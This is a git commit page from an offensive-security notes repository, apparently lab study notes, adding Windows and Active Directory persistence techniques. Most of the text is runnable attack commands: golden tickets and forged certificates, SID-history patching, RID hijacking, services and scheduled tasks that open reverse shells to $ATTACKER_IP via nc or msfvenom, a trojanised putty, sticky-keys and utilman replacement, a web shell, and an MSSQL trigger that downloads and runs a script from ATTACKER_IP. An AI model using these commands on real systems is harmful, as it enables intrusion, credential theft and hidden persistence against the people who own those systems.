whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

av evasion

This commit is contained in:
Stefan Friese 2022-07-21 23:21:38 +02:00
parent 493605e76e
commit c9f4187e9b
5 changed files with 5090 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

146
misc/active_directory/ad_persistence.md
View File

@ -50,3 +50,149 @@ Get-ADDomain
kerberos::golden /admin:MyLittleAdministrator /domain:<domain> /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
```
## Using Certificates
* Private key extraction via mimikatz which makes it exportable
```sh
crypto::certificates /systemstore:local_machine
privilege::debug
crypto::capi
crypto::cng
crypto::certificates /systemstore:local_machine /export
```
* Password of the certificate is `mimikatz` afterwards
* Use [ForgeCert](https://github.com/GhostPack/ForgeCert) to create certificate
```sh
ForgeCert.exe --CaCertPath <domain>.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@<domain> --NewCertPath Administrator.pfx --NewCertPassword SecretPassword
```
*
* Use Rubeus to request the TGT via
```sh
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain> /dc:<IP of domain controller>
```
* Load the TGT via mimikatz
```sh
privilege::debug
kerberos::ptt administrator.kirbi
dir \\<dc.example.com>\C$\
```
## Using SID History
* Account logs on -> associated SIDs (group SIDs) added to the user's token -> permissions are set in this way
* SIDs of controlled accounts may be added to the history
* Add Administrator group to the associated SIDs / the token
* `ntds.dit` stores all AD info
* User does not come up on checking groups, the user stays hidden unless searched for explicitly
### Usage
* Check SID history
```sh
Get-ADUser <your ad username> -properties sidhistory,memberof
```
* Check SID of domain admins
```sh
Get-ADGroup "Domain Admins"
```
* Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
```sh
Stop-Service -Name ntds -force
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
Start-Service -Name ntds
```
* Verify users SIDs
```sh
Get-ADUser <username> -Properties sidhistory
dir \\<dc.example.com>\C$\
```
## Using Group Memberships
* Most are monitored security wise
* Interesting group for persistence are
* `IT Support`
* Local administrational accounts
* Groups with ownership over GPO
* Nested groups are used to organize an AD
* `Helpdesk`, `Network Manager` is a nested group of `IT Support`
* Joining a nested groups is not as alerting as joining a more general group
### Usage
* Create a new subgroup
```sh
New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" -Name "<username> Steam Network 1" -SamAccountName "<username>_steam_network1" -DisplayName "<username> Steam Network 1" -GroupScope Global -GroupCategory Security
```
* And nesting another one
```sh
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
```
* Do it a couple of times again and add the last group to Domain Admins
```sh
Add-ADGroupMember -Identity "Domain Admins" -Members "<username>_2"
```
* Add the low priv user to the first group
```sh
Add-ADGroupMember -Identity "<username>_steam_networks1" -Members "<low privileged username>"
```
* And check
```sh
dir \\<domain>\c$\
```
* Verify nested group
```sh
Get-ADGroupMember -Identity "Domain Admins"
```
## Using ACLs
* AD group templates like `AdminSDHolder` can be used to copy its ACL through the AD's protected groups
* Domain Admins
* Administrators
* Enterprise/Schema Administrator
* SDProp as a process maps the ACLs to protected groups every hour
## Usage
* `runas /netonly /user:Administrator cmd.exe` and therein open `mmc`
* File -> Add Snap-In -> Active Directory Users and Groups
* View -> Advanced Features
* AdminSDHolder group in Domain -> System
* Right click the group -> Properties -> Security -> Add user and Check Names -> OK -> Allow on Full Control -> Apply -> OK
* Add the user to other groups with the new propagated permissions
## Using GPOs
* Restricted Group Memberships, admin access to every host in the domain
* Logon Script Deployment, get a shell when a user logs in
### Usage
* Craft a portable executable shell via meterpreter
* Craft a batch script
```sh
copy \\<domain>\sysvol\<subdomain>\scripts\shell.exe C:\windows\tmp\_shell.exe && timeout /t 20 && C:\windows\tmp\shell.exe
```
* Copy both to the sysvol
* `runas /netonly /user:Administrator cmd.exe` and therein open `mmc`
* File -> Add/Remove Snap-in -> Group Policy Management -> Add -> OK
* Right click Admins OU -> Create GPO in the domain -> link it -> name it
* Right click created policy -> Enforced
* Right click created policy -> edit -> User Configuration / Policies -> Window Settings -> Scripts (logon/logoff)
* Right click Logon -> Properties -> Scripts tab -> Add -> Browse
* Select the previously created batch script and PE
* Catch the shell when an admin logs on
* Once again open mmc
* Right click Enterprise Domain Controllers -> Edit settings, delete, modify security
* Click on every other group except Authenticated Users and remove them
* Add -> `Domain Computers` -> check names - OK
* Read Permissions -> OK -> Authenticated Users -> Remove

23
misc/clamav.md Normal file
View File

@ -0,0 +1,23 @@
# ClamAV
* Can be started with custom database or yara rules
## Hashes Database
* `*.hdb` is a database containing hashes. Can be customized and scanned against
## Yara Rules
* Custom `*.yara` rules can be set. An example
```yara
rule example {
meta:
author = "Gabe Newell"
description = "Look at how the Yara rule works with ClamAV"
strings:
$string = "a-string-found-inside-the-malicious-binary"
$file_signature = "magic-number-in-ascii"
condition:
#file_signature at 0 and $string
}
```

266
persistence/persistence.md
View File

@ -41,22 +41,125 @@ bitsadmin /SetMinRetryDelay 30
bitsadmin /resume
```
## High Priv
## Elevate Privileges
* Create user `net user /add <user> <pass>`
* Add to admin group via `net localgroup Administrator <user> /add`
* Add to admin group via `net localgroup administrators <user> /add`
* Check `net localgroup Administrator`
### Add to registry
### More stealthy
* Backup Operator group is more stealthy, no admin by r/w on files
```sh
net localgroup "Backup Operators" <user> /add
net localgroup "Remote Management Users" <user> /add
```
* The following two groups are assigned through membership of `Backup Operators`
* SeBackupPrivilege, read files
* SeRestorePrivilege, write files
* Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via
```sh
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
```
* Afterwards, check if `Backup Operators` is enabled via `whoami /groups`
* Backup `SAM` and `SYSTEM` via
```sh
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
secretsdump.py -sam sam.bak -system system.bak LOCAL
```
* Pass-the-hash via evil-winrm
### secedit
* Get r/w on files through editing a config file
* Export secedit and open it
```sh
secedit /export /cfg config.inf
```
* Add user to the groups
```sh
SeBackupPrivilege = [...],<username>
SeRestorePrivilege = [...],<username>
```
* Convert the file
```sh
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.infk
```
* Add the user to the RDP group via net localgroup like before or do
```sh
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
```
* Add & Click user -> Full Control(All Operations)
* Set `LocalAccountTokenFilterPolicy` to `1` like in the section before
### Relative ID (RID)
* UID like in linux
* Administrator has `RID = 500`
* Other interactive users `RID >= 1000`
* Get RIDs
```sh
wmic useraccount get name,sid
```
* Assign `500` to regular user
```sh
PsExec64.exe -i -s regedit
```
* Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>`
* Search for RID value as hexadecimal value
* Open the key called `F` and change effective RID at position `0x30`
* Insert LE hex of `0d500`, which is `f401`
## Add to registry
* Execute on user logon via
```sh
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f
```
### Add a Service
## Add a Service
### Meterpreter
* Inside meterpreter `load powershell` and `powershell_shell`
```sh
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"
```
### Add Scheduled Task
### Powershell
* Start a service automatically
```sh
sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
sc.exe start SteamUpdater
```
* Use a service PE instead
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
```
* Modify an existing service
* Enumerate all the services
```sh
sc.exe query state=all
```
* Info about a specific service, start type should be automatic, service start name should be target user
```sh
sc.exe qc <ServiceName>
```
* Reconfigure
```sh
sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
sc.exe start FoundService
```
## Add Scheduled Task
```sh
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
$B = New-ScheduledTaskTrigger -AtLogOn
@ -65,3 +168,156 @@ $D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask ReverseShell -InputObject $E
```
* Alternatively via `schtasks`
```sh
schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM
```
* Check task
```sh
schtasks /query /tn SteamUpdater
```
* Deleting Security Descriptor of a task to make it invisible. Delete the following key
```sh
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<taskname>\SD
```
## File Backdoor
### Mimic PE
```sh
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe
```
### Reference Script
* Recycle shortcut of an app to reference a reverse shell script
* Right click -> `Properties` -> `Target`
* Reference the the script `certainlynobackdoor.ps1` via
```sh
powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
```
* Content of the script `certainlynobackdoor.ps1`
```sh
Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\System32\calc.exe
```
### File Association
* Change associated `ProgID` of a file type inside registry `HKLM\Software\Classes\`
* Choose a class and `<class>/shell/open/command` contains the file to be opened as the first argument `%1`
* Chang the argument to a shell script and pass the arg through it
```sh
Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\system32\NOTEPAD.EXE $args[0]
```
* Change `command\default` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1`
## Persistence via Logon
### Startup directories
* Users' Startup directory under
```sh
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```
* Startup directory for all users, put the reverse shell here
```sh
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
```
### Registry Keys
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* Create `Expandable String Value` under any of this keys with the value of the reverse shell path
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` loads user profile after authentication is done
* Either `shell` or `Userinit` can be appended with a comma separated command
### Logon Scripts
* `userinit.exe` checks var `UserInitMprLogonScript` which cann be used to load logon scripts
* Create variable `UserInitMprLogonScript` under `HKCU\Environment` which gets the reverse shell as a payload
## RDP or Login Screen
### Sticky Keys
* Press shift x 5 and `C:\Windows\System32\sethc.exe` will be executed
* Take ownership of the binary via
```sh
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
```
* Overwrite with `cmd.exe`
```sh
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
```
### Utilman
* Ease of access button is clickable at the login screen, it is executed with system privileges
* Take ownership and overwrite with `cmd.exe`
```sh
takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
```
## Web Shell
* Default user is `iis apppool\defaultapppool`
* Has `SeImpersonatePrivilege`
* [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx)
* Move shell to `C:\inetpub\wwwroot` on target
* Get the shell via `http://$TARGET_IP/shell.aspx`
## MSSQL
* Triggers bind actions such as INSERTs
* Open Microsoft SQL Server Management Studio
* Choose windows auth
* `New Query`
* Enable Advance Options via
```sh
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO
sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO
```
* Grant privileges to all users
```sh
USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];
```
* Change to DB
```sh
USE <DATABASE>
```
* Create trigger
```sh
CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees
FOR INSERT AS
EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
```
* Trigger the trigger by visiting the site which triggers the trigger through a db call

10
post_exploitation/docs/windows/antivirus_evasion.md
View File

@ -5,8 +5,14 @@
* In-Memory evasion
* Detection Methods
* Static Detection -- Hash or String/Byte Matching
* Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox
* Static Detection -- Hash or String/Byte Matching
* Dynamic -- predefined rules, run inside a sandbox, querying API and syscalls at runtime
* Heuristic / Behaviourial Detection -- threshold hits by either static comparison of decompiled code or dynamically analyzed software
* Additional Features
* Unpacker -- decrypting and decompress
* PE header parser -- portable executable headers are parsed
* Emulation -- analysis in an emulated env
## Enumeration
```sh

4652
post_exploitation/priv_esc/privesc-scripts/zeus@olympus.thm Normal file
View File

File diff suppressed because one or more lines are too long